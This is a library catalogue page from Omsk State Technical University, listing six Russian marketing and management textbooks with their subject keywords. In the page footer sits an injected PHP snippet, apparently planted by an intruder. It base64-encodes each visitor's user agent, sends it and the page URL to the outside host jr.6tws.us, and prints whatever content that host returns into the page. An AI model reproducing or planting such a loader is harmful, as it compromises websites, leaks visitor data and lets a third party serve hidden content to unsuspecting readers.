Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

135 пользователей


Зарегистрированных: 2 

Борисенко Виктория Александровна

Хильченко Денис Анатольевич


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПОЛИТИКА СБЫТОВАЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 6
1. 
Ноздрева Р. Б. Международный маркетинг [Текст] : учеб. для студентов высш. учеб. заведений / Р. Б. Ноздрева, 2005. - 990 с.
Держатели документа (Информация об экземплярах) 
2. 
Дурович А. П. Маркетинг гостиниц и ресторанов [Текст] : учеб. пособие / А. П. Дурович, 2005. - 632 с.
Ключевые слова 
МАРКЕТИНГ ГОСТЕПРИИМСТВА -- МАРКЕТИНГ гостиниц -- Маркетинг ресторана -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ -- СРЕДА МАРКЕТИНГОВАЯ -- РЫНОК - ИССЛЕДОВАНИЕ маркетинговое -- СТРАТЕГИЯ МАРКЕТИНГОВАЯ -- Политика продуктовая -- ПОЛИТИКА ЦЕНОВАЯ - МАРКЕТИНГ -- ПОЛИТИКА СБЫТОВАЯ -- ПОЛИТИКА КОММУНИКАЦИОННАЯ -- РЕКЛАМА - МАРКЕТИНГ -- ПРОДАЖА ЛИЧНАЯ -- СТИМУЛИРОВАНИЕ СБЫТА -- СВЯЗЬ С ОБЩЕСТВЕННОСТЬЮ -- ВЫСТАВКА - МАРКЕТИНГ -- ЯРМАРКА - МАРКЕТИНГ -- СТИЛЬ ФИРМЕННЫЙ -- ОРГАНИЗАЦИЯ маркетинга -- КОНТРОЛЬ маркетинга
Держатели документа (Информация об экземплярах) 
3. 
Белоусова С. Н. Маркетинг [Текст] : Учеб. пособие для студ. образоват. учреждений сред. проф. образования / С. Н. Белоусова, А. Г. Белоусов, 2003. - 252 с.
Ключевые слова 
МАРКЕТИНГ - ИСТОРИЯ -- РЫНОК - МАРКЕТИНГ -- РЫНОК ЦЕЛЕВОЙ -- СЕГМЕНТАЦИЯ РЫНКА -- ПОЗИЦИОНИРОВАНИЕ ТОВАРА -- СРЕДА ВНЕШНЯЯ - МАРКЕТИНГ -- Среда внутренняя - маркетинг -- ПОТРЕБНОСТЬ - МАРКЕТИНГ -- ПОТРЕБИТЕЛЬ - Маркетинг -- ПОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКОЕ -- КОНКУРЕНЦИЯ -- СЛУЖБА МАРКЕТИНГА -- ТОВАР - МАРКЕТИНГ -- ПОЛИТИКА ТОВАРНАЯ -- ЦИКЛ ЖИЗНЕННЫЙ ТОВАРА -- УПАКОВКА ТОВАРА -- бренд -- БРЕНДИНГ -- СБЫТ ТОВАРА -- ПОЛИТИКА СБЫТОВАЯ -- ПОСРЕДНИК ТОРГОВЫЙ -- ЦЕНА - МАРКЕТИНГ -- ПОЛИТИКА ЦЕНОВАЯ ПРЕДПРИЯТИЯ -- ПРОДВИЖЕНИЕ ТОВАРА -- РЕКЛАМА - МАРКЕТИНГ -- КАМПАНИЯ РЕКЛАМНАЯ -- ПРОДАЖА ЛИЧНАЯ -- мерчандайзинг -- ПАБЛИК РИЛЕЙШНЗ -- ФОССТИС -- ПЛАНИРОВАНИЕ МАРКЕТИНГОВОЕ -- ПЛАНИРОВАНИЕ СТРАТЕГИЧЕСКОЕ -- КОНТРОЛЬ МАРКЕТИНГОВЫЙ -- СТРАТЕГИЯ МАРКЕТИНГОВАЯ -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ -- ИНФОРМАЦИЯ МАРКЕТИНГОВАЯ -- МАРКЕТИНГ - СЛОВАРЬ ТЕРМИНОВ
Держатели документа (Информация об экземплярах) 
4. 
Гончаров В. И. Менеджмент [Текст] : Учеб. пособие для студ. вузов эконом. спец. / В. И. Гончаров, 2003. - 623 с.
Ключевые слова 
ОРГАНИЗАЦИЯ - Менеджмент -- МЕНЕДЖЕР -- УПРАВЛЕНИЕ ОРГАНИЗАЦИЕЙ -- МЕНЕДЖМЕНТ - ИСТОРИЯ -- МЫСЛЬ УПРАВЛЕНЧЕСКАЯ -- ПОЛНОМОЧИЯ ОРГАНИЗАЦИОННЫЕ -- Департаментация -- ДЕЛЕГИРОВАНИЕ ПОЛНОМОЧИЙ -- КОНТРОЛЬ - УПРАВЛЕНИЕ -- МОТИВАЦИЯ - МЕНЕДЖМЕНТ -- СТРУКТУРА ОРГАНИЗАЦИОННАЯ -- БЮРОКРАТИЯ рациональная -- ЛИДЕРСТВО -- СТИЛЬ РУКОВОДСТВА -- РУКОВОДСТВО адаптивное -- РЕШЕНИЕ УПРАВЛЕНЧЕСКОЕ -- ПРИНЯТИЕ РЕШЕНИЙ -- УПРАВЛЕНИЕ ВНУТРИФИРМЕННОЕ -- ПЛАНИРОВАНИЕ ВНУТРИФИРМЕННОЕ -- управление маркетингом -- ПРЕДПРИЯТИЕ ПРОМЫШЛЕННОЕ -- СТИМУЛИРОВАНИЕ СБЫТА -- ПОЛИТИКА СБЫТОВАЯ -- Планирование перспективное -- ПЛАНИРОВАНИЕ СТРАТЕГИЧЕСКОЕ -- КУЛЬТУРА ОРГАНИЗАЦИОННАЯ -- РЕИНЖИНИРИНГ БИЗНЕСА -- КОНТРОЛЬ УПРАВЛЕНЧЕСКИЙ -- УПРАВЛЕНИЕ ФИНАНСАМИ ПРЕДПРИ -- МЕНЕДЖМЕНТ ФИНАНСОВЫЙ -- ПОЛИТИКА ФИНАНСОВАЯ ПРЕДПРИЯ -- УЧЕТ УПРАВЛЕНЧЕСКИЙ -- ОТЧЕТНОСТЬ ФИНАНСОВАЯ -- УПРАВЛЕНИЕ ИННОВАЦИЯМИ -- МЕНЕДЖМЕНТ ИННОВАЦИОННЫЙ -- ПРОЦЕСС ИННОВАЦИОННЫЙ -- ЭФФЕКТИВНОСТЬ ПРОИЗВОДСТВА -- УПРАВЛЕНИЕ ПЕРСОНАЛОМ -- УПРАВЛЕНИЕ ПРОИЗВОДСТВОМ -- УПРАВЛЕНИЕ АНТИКРИЗИСНОЕ -- РЕАБИЛИТАЦИЯ предприятия -- Расчет внутрифирменный -- ПОЛИТИКА ЦЕНОВАЯ -- ЦЕНА ВНУТРИФИРМЕННАЯ -- КОНКУРЕНТОСПОСОБНОСТЬ ПРОДУК -- УПРАВЛЕНИЕ КАЧЕСТВОМ -- РЕФОРМИРОВАНИЕ предприятия -- АДАПТАЦИЯ предприятия -- УПРАВЛЕНИЕ КОРПОРАТИВНОЕ -- КАДРЫ УПРАВЛЕНЧЕСКИЕ -- БАНКРОТСТВО ПРЕДПРИЯТИЯ -- Диагностика банкротства -- РЕСТРУКТУРИЗАЦИЯ ПРЕДПРИЯТИЯ -- ИНТЕГРАЦИЯ межфирменная -- ГРУППА ФИНАНСОВО-ПРОМЫШЛЕННА -- ФПГ -- ТНК -- ИНТЕГРАЦИЯ ПРЕДПРИЯТИЙ -- КОРПОРАЦИЯ ТРАНСНАЦИОНАЛЬНАЯ
Держатели документа (Информация об экземплярах) 
5. 
Мурахтанова Н. М. Маркетинг [Текст] : Учеб. пособие для студ. учреждений сред. проф. образования / Н. М. Мурахтанова, Е. И. Еремина, 2002. - 208 с.
Ключевые слова 
РЫНОК -- КОНЪЮНКТУРА РЫНКА -- Маркетинг целевой -- Маркетинг дифференцированный -- Маркетинг недифференцированный -- СЕГМЕНТАЦИЯ РЫНКА -- ТОВАР -- Маркетинг практический -- ПОЛИТИКА ТОВАРНАЯ -- ПОЛИТИКА АССОРТИМЕНТНАЯ -- ПОЛИТИКА ИННОВАЦИОННАЯ -- АССОРТИМЕНТ -- ЦЕНА -- ЦЕНООБРАЗОВАНИЕ -- РЕАЛИЗАЦИЯ ТОВАРА -- СБЫТ -- Политика сбытовая -- ПОЛИТИКА коммуникационная -- РЕКЛАМА -- Продажа прямая -- Политика сервисная -- РЕКЛАМА - ПРАВО -- ЯРМАРКА -- ВЫСТАВКА -- СТИЛЬ фирменный -- ЗНАК ТОВАРНЫЙ -- УПАКОВКА -- МАРКИРОВКА -- ПЛАНИРОВАНИЕ СТРАТЕГИЧЕСКОЕ -- ПРОГРАММА маркетинговая -- СИСТЕМА ИНФОРМАЦИОННАЯ маркетинговая -- СТРАТЕГИЯ МАРКЕТИНГОВАЯ -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ
Держатели документа (Информация об экземплярах) 
6. 
Бринк И. Ю. Бизнес-план предприятия. Теория и практика [Текст] : [учеб. пособие] / И. Ю. Бринк, Н. А. Савельева, 2002. - 378 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3079 - 14.11.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.73 с.12 запросов, 0.47c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;